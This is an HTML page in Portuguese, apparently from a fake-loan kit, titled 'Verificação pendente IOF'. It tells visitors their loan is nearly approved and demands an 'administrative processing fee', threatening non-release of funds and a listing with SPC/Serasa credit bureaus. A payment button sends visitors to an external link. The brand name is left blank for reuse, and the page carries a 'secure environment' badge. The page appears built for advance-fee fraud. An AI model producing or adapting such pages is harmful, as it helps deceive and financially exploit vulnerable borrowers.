<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verificação pendente IOF</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="../assets/style.css">
    <script src="../assets/js/links.js"></script>
    
</head>
<body>

    <nav class="navbar">
        <div class="container">
            <div class="logo-container">
                <img src="../assets/logo.png" alt="Logo" class="img-fluid w-50 img-branca">
            </div>
        </div>
    </nav>


    <!--BOX VIDEO, timeline...-->
    <div class="card border border-secondary shadow p-4 my-4 mx-3 mx-md-4">



      <div class="justify-content-center align-items-center mb-4">
        <h4 class="alert-success">Taxa de Processamento Administrativo
        </h4>
        <p>
            Seu empréstimo está em fase final de aprovação! A Taxa de Processamento Administrativo é necessária para cobrir os custos operacionais e garantir que o valor seja liberado com segurança e dentro dos padrões exigidos.


           
        </p>

        <p style="color:#2e3191; font-weight: 400;">Pague agora e conclua a última etapa para receber seu valor!</p>
      </div>


        <div class="alert alert-danger mb-3 position-relative overflow-hidden">
            <div class="position-absolute" style="left: -50px; top: 50%; transform: translateY(-50%); opacity: 0.15; z-index: 0;">
                <svg xmlns="http://www.w3.org/2000/svg" width="120" height="120" fill="currentColor" class="bi bi-exclamation-triangle-fill" viewBox="0 0 16 16">
                    <path d="M8.982 1.566a1.13 1.13 0 0 0-1.96 0L.165 13.233c-.457.778.091 1.767.98 1.767h13.713c.889 0 1.438-.99.98-1.767L8.982 1.566zM8 5c.535 0 .954.462.9.995l-.35 3.507a.552.552 0 0 1-1.1 0L7.1 5.995A.905.905 0 0 1 8 5zm.002 6a1 1 0 1 1 0 2 1 1 0 0 1 0-2z"/>
                </svg>
            </div>
            <div class="d-flex flex-column align-items-start position-relative" style="z-index: 1;">
                <strong class="text-danger mb-2">Atenção</strong>
                <span>Não pagar a taxa pode resultar no não envio do valor e inclusão no SPC/Serasa.</span>
            </div>
        </div>


      <button class="btn btn-primary w-100 mb-3" 
        onclick="redirect('up12')">
          Pagar Consultoria Financeira
      </button>
      

      <div class="d-flex align-items-center justify-content-center gap-2 text-muted small mb-4">
        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 256 256">
            <path fill="#3db1a5" d="M216 56v56c0 96-88 120-88 120s-88-24-88-120V56a8 8 0 0 1 8-8h160a8 8 0 0 1 8 8" opacity=".2"/>
            <path fill="#3db1a5" d="M208 40H48a16 16 0 0 0-16 16v56c0 52.72 25.52 84.67 46.93 102.19c23.06 18.86 46 25.26 47 25.53a8 8 0 0 0 4.2 0c1-.27 23.91-6.67 47-25.53C198.48 196.67 224 164.72 224 112V56a16 16 0 0 0-16-16m0 72c0 37.07-13.66 67.16-40.6 89.42a129.3 129.3 0 0 1-39.4 22.2a128.3 128.3 0 0 1-38.92-21.81C61.82 179.51 48 149.3 48 112V56h160Zm-70.34-18.34a8 8 0 0 0-11.32 0L120 148.69l-10.34-10.35a8 8 0 0 0-11.32 11.32l16 16a8 8 0 0 0 11.32 0l56-56a8 8 0 0 0-11.32-11.32Z"/>
        </svg>
        Ambiente seguro
      </div>





    </div>
    <!-- /conteudo do container do video-->




    <!--FOOTER-->
    <footer class="footer py-3 mt-4 border-top">
    <div class="container">
        <div class="row justify-content-center text-center text-md-start">
        <div class="col-12 col-md-8">
            <p class="mb-2">
            © <span id="currentYear"></span> <span class="marca" style="text-transform: uppercase;"></span> S.A.<br>CNPJ: 60.779.196/0001-96<br>
            <small class="d-block mt-2">
                Avenida Presidente Wilson, 9<br>
                São Vicente/SP - CEP 11320-905
            </small>
            </p>
        </div>
        </div>
    </div>
    </footer>
    

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>

</body>
</html>